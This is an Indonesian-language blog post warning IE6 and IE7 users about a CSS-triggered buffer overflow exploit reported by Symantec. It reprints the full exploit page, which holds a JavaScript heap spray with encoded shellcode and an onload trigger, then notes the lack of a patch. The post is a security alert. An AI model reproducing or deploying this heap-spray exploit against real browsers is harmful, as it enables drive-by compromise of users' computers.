Beranda > Breaking News > Exploit Baru Serang IE6 dan IE7

Exploit Baru Serang IE6 dan IE7

Bagi reman-reman (rekan/teman) yang aktif menggunakan Window dan Internet Explorer 6/7, berita baru menetes dari Symantec menyebutkan terdeteksinya Exploit baru yang mentarget IE6 dan IE7. Kalau IE6 mungkin sudah lumrah terjadi, namun yang ini juga efektif untuk IE7.

Exploit ini menyerang melalui CSS content (bukan javascript) dari situs yang dikunjungi yang menyebabkan browser anda mengalami buffer overflow. Selanjutnya program javascript akan dijalankan menjadi alat eksploitasi dari pembuat eksploit dan menyebarkan serangan lanjutan.

Inilah -contoh- exploit terbaru tsb.

<!DOCTYPE HTML PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;
<HTML xmlns=”http://www.w3.org/1999/xhtml”&gt;
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName(“STYLE”)[0];
e.outerHTML=”1″;
}
</script>
<STYLE type=”text/css”>
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language=”javascript”>
var shellcode = unescape(“%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063”);
var bigblock = unescape(“%u9090%u9090″);
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload=”load()”>
</BODY>
</HTML>

Siapa mengira html yang sepintas nampak biasa-biasa saja ini adalah sebuah exploit untuk IE anda ?

Perbaikan pada IE belum disediakan oleh Microsoft namun anda bisa menggunakan anti virus produksi Symantec (Norton Anti Virus).

  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: